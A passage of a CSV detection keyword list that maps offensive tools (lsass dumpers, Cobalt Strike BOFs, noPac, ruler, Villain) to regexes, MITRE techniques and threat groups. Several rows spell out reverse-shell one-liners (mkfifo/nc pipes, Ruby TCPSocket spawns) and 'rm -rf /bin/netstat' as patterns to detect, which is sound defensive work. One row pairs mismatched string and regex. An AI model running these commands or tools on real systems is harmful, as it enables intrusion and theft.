Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","57303" "*ricardojoserf/TrickDump*",".{0,1000}ricardojoserf\/TrickDump.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","1","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","57304" "*RiccardoAncarani/BOFs*",".{0,1000}RiccardoAncarani\/BOFs.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - 
Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","N/A","10","10","118","13","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z","57305" "*RiccardoAncarani/LiquidSnake*",".{0,1000}RiccardoAncarani\/LiquidSnake.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","N/A","10","10","332","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z","57306" "*RiccardoAncarani/TaskShell*",".{0,1000}RiccardoAncarani\/TaskShell.{0,1000}","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/TaskShell","1","1","N/A","N/A","10","10","56","9","2021-02-15T19:23:13Z","2021-02-15T19:22:26Z","57307" "*rid_hijack.py*",".{0,1000}rid_hijack\.py.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new 
features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","57308" "*ridbrute_attack*",".{0,1000}ridbrute_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","57309" "*RIDHIJACK.ps1*",".{0,1000}RIDHIJACK\.ps1.{0,1000}","offensive_tool_keyword","RID-Hijacking","RID Hijacking Proof of Concept script by Kevin Joyce","T1174","TA0003","N/A","N/A","Persistence","https://github.com/STEALTHbits/RIDHijackingProofofConceptKJ","1","1","N/A","N/A","9","1","15","7","2018-10-30T15:00:03Z","2018-10-29T19:52:10Z","57310" "*ridrelay*",".{0,1000}ridrelay.{0,1000}","offensive_tool_keyword","ridrelay","Quick and easy way to get domain usernames while on an internal network.","T1175 - T1553.002 - T1553.003","TA0003 - TA0008 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/skorov/ridrelay","1","0","N/A","N/A","N/A","4","395","56","2020-05-20T03:35:32Z","2018-04-14T22:10:01Z","57311" "*Ridter/atexec-pro*",".{0,1000}Ridter\/atexec\-pro.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","1","N/A","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","57312" 
"*Ridter/noPac*",".{0,1000}Ridter\/noPac.{0,1000}","offensive_tool_keyword","noPac","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","1","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","57313" "*righteousgambit/quiet-riot*",".{0,1000}righteousgambit\/quiet\-riot.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","57314" "*RING0_ANONYMOUS_PIPE*",".{0,1000}RING0_ANONYMOUS_PIPE.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","57315" "*ring04h#s5.go*",".{0,1000}ring04h\#s5\.go.{0,1000}","offensive_tool_keyword","venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","57316" "*Ring0NamedPipeFilter *",".{0,1000}Ring0NamedPipeFilter\s.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","57317" "*Ring0NamedPipeFilter.h*",".{0,1000}Ring0NamedPipeFilter\.h.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","57318" "*Ring3NamedPipeConsumer.exe*",".{0,1000}Ring3NamedPipeConsumer\.exe.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","57319" "*Ring3NamedPipeMonitor*",".{0,1000}Ring3NamedPipeMonitor.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","57320" "*Ring3NamedPipeMonitor.dll*",".{0,1000}Ring3NamedPipeMonitor\.dll.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","57321" "*Ripemd-160.test-vectors.txt*",".{0,1000}Ripemd\-160\.test\-vectors\.txt.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","57322" "*riskydissonance/SafetyDump*",".{0,1000}riskydissonance\/SafetyDump.{0,1000}","offensive_tool_keyword","SafetyDump","in memory process dumper - uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output","T1003.005 - T1059.001 - T1105 - T1071.001","TA0005 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","1","N/A","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","57331" "*rkervella/CarbonMonoxide*",".{0,1000}rkervella\/CarbonMonoxide.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda 
- AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","57332" "*rktazuzi7hbln7sy.onion*",".{0,1000}rktazuzi7hbln7sy\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","57333" "*rlwrap -cAr nc -lvnp *",".{0,1000}rlwrap\s\-cAr\snc\s\-lvnp\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","57335" "*rlwrap nc -lvnp *",".{0,1000}rlwrap\snc\s\-lvnp\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57336" "*rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | sh -i 
2>&1 | nc *",".{0,1000}rm\s\/tmp\/f\;mkfifo\s\/tmp\/f\;cat\s\/tmp\/f\s\|\ssh\s\-i\s2\>\&1\s\|\snc\s.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57342" "*rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc * >/tmp/f*",".{0,1000}rm\s\/tmp\/f\;mkfifo\s\/tmp\/f\;cat\s\/tmp\/f\|sh\s\-i\s2\>\&1\|nc\s.{0,1000}\s\>\/tmp\/f.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57343" "*rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u * >/tmp/*",".{0,1000}rm\s\/tmp\/f\;mkfifo\s\/tmp\/f\;cat\s\/tmp\/f\|sh\s\-i\s2\>\&1\|ncat\s\-u\s.{0,1000}\s\>\/tmp\/.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57344" "*rm -f *.o dump_vdso test_payload*",".{0,1000}rm\s\-f\s.{0,1000}\.o\sdump_vdso\stest_payload.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","N/A","10","972","393","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z","57349" "*rm -rf /bin/netstat*",".{0,1000}rm\s\-rf\s\/bin\/netstat.{0,1000}","offensive_tool_keyword","Aoyama ","Python Botnet ","T1059 - T1219 - T1090 - T1102 - T1213 - T1095 - T1071 - T1486 - 
T1083 - T1041 - T1012 - T1027","TA0011 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/Leeon123/Aoyama","1","0","#linux","N/A","10","10","260","63","2022-03-23T09:49:43Z","2019-07-16T13:04:07Z","57357" "*rm -rf /tmp/backpipe;mknod /tmp/backpipe p;telnet * 0TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""\/bin\/bash\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57621" "*ruby -rsocket -e'spawn(""/bin/sh"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""\/bin\/sh\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57622" "*ruby -rsocket -e'spawn(""bash"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""bash\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57623" "*ruby -rsocket -e'spawn(""cmd"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""cmd\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - 
T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57624" "*ruby -rsocket -e'spawn(""powershell"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""powershell\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57625" "*ruby -rsocket -e'spawn(""pwsh"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""pwsh\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57626" "*ruby -rsocket -e'spawn(""sh"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""sh\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57627" "*ruby -rsocket -e'spawn(""zsh"",[:in,:out,:err]=>TCPSocket.new(*",".{0,1000}ruby\s\-rsocket\s\-e\'spawn\(\""zsh\"",\[\:in,\:out,\:err\]\=\>TCPSocket\.new\(.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","57628" "*ruby_nntpd_cmd_exec*",".{0,1000}ruby_nntpd_cmd_exec.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","57629" "*ruby_no_sh_reverse_tcp.py*",".{0,1000}ruby_no_sh_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","57630" "*ruby_reverse_tcp.py*",".{0,1000}ruby_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","57631" "*Rudrastra-main.zip*",".{0,1000}Rudrastra\-main\.zip.{0,1000}","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","N/A","8","1","67","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z","57632" "*ruler * abk dump -o *",".{0,1000}ruler\s.{0,1000}\sabk\sdump\s\-o\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57644" "*ruler --insecure *",".{0,1000}\/ruler\s\-\-email\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","57645" "*ruler -k -d * brute --users *",".{0,1000}ruler\s\-k\s\-d\s.{0,1000}\sbrute\s\-\-users\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57646" "*ruler -k --nocache --url ",".{0,1000}ruler\s\-k\s\-\-nocache\s\-\-url\s","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","57647" "*ruler-linux64*",".{0,1000}ruler\-linux64.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","#linux","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","57648" "*ruler-linux86*",".{0,1000}ruler\-linux86.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","#linux","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","57649" "*ruler-osx64*",".{0,1000}ruler\-osx64.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","57650" "*ruler-win64.exe*",".{0,1000}ruler\-win64\.exe.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - 
